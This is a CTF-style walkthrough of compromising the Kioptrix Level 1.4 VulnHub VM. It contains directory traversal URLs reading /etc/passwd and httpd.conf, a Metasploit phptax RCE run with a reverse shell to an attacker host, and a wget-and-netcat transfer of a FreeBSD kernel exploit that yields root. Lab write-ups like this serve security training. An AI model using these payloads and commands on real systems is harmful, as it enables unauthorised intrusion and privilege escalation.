VulnHub Writeup : Kioptrix Levle 1.4 (#5)

Box Stats :

Box InformationDetails
Box NameKioptrix Level 1.4
Series Kioptrix
Release Date6 Apr 2014
AuthorKioptrix
DifficultyEasy
Download LinkLink

Network Scan

The IP of target vm is 192.168.1.159, Perform nmap scan on targat

$ nmap -sV --top-ports 1000 192.168.1.159 -oN nmap.txt                                                                                              

Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-26 16:38 EDT
Nmap scan report for 192.168.1.159
Host is up (0.00050s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.54 seconds

As we can see port 80 and 8080 are open. Checking port 80 web server, it only had It works! message, but in page source there is commented part which points to pchart link

Now open http://192.168.1.159/pchart2.1.3/index.php there is an pchart application hosted on port 80

Now google search shows that pChart 2.1.3 has XSS and Directory traversal vulnerability, where directory traversal vulnerability can be exploited by accessing below link

http://192.168.1.159/pchart2.1.3/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

at this point can not do much with this vulnerability, now lets check port 8080.

It says access forbidden. But we can access the apache server httpd.conf file because of directory traversal vulnerability. And we also know that the os is FreeBsd then the location of httpd.conf file would be /usr/local/etc/apache2x/httpd.conf, now lets try to access it.

http://192.168.1.159/pchart2.1.3/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache2x/httpd.conf

The above picture shows the last lines of httpd.conf file which indicates that the browser user agent has been checked by the web server and if user agent is Mozilla/4.0 then only it can access the application running on port 8080.

So we have to change the browser user agent to mozilla/4.0, and for that we are going to install User agent switcher plugin into firefox browser and then try to access the service running on port 8080

Add Mozilla/4.0 (compatible; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8) to Kioptrix5

Now enable the custom user agent then access http://192.168.1.159:8080

Open http://192.168.1.159:8080

the phptax app is hosted on http://192.168.1.159:8080/phptax/, a google search on phptax has Remote code execution vulnerability, and there also a metasploit module available to for phptax rce vulnerability, so we are going to use metasploit.

msf6 > use exploit/multi/http/phptax_exec
msf6 exploit(multi/http/phptax_exec) > set RHOSTS 192.168.1.159
RHOSTS => 192.168.1.159
msf6 exploit(multi/http/phptax_exec) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/phptax_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(multi/http/phptax_exec) > set lhost 192.168.1.6
lhost => 192.168.1.6
msf6 exploit(multi/http/phptax_exec) > exploit

[*] Started reverse TCP double handler on 192.168.1.6:4444
[*] 192.168.1.1598080 - Sending request...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo y6th2VULrYqot44x;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Command: echo jVPGdJKnv4d3Y4jP;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "Connected: not found\r\nEscape: not found\r\njVPGdJKnv4d3Y4jP\r\n"
[*] Reading from socket B
[*] B: "y6th2VULrYqot44x\r\n"
[*] Matching...
[*] A is input...
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.1.6:4444 -> 192.168.1.159:25038) at 2021-10-27 16:06:00 -0400

[*] Command shell session 2 opened (192.168.1.6:4444 -> 192.168.1.159:35833) at 2021-10-27 16:06:00 -0400
whoami
www
id
uid=80(www) gid=80(www) groups=80(www)
uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

Now for privilege escalation, there is a kernel exploit available for FreeBSD 9.0 at exploitdb. Now first download the exploit into attacker machine, then we have to upload/send the exploit code into target machine and compile it and run it on target.

We are going to use nc to send the exploit into target machine

wget https://www.exploit-db.com/download/26368 -O exploit.c
nc -lvvp 8888 < exploit.c 

the nc listener is listening on port 8888. To download it into target machine, just connect to the attacker machine by

nc 192.168.1.6 8888 > exploit.c

It may takes few seconds to download, then compile and run the exploit

gcc exploit.c -o exploit
exploit.c:89:2: warning: no newline at end of file
./exploit
id
uid=0(root) gid=0(wheel) egid=80(www) groups=80(www)
whoami
root

And as we can see we have root access to the machine..

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.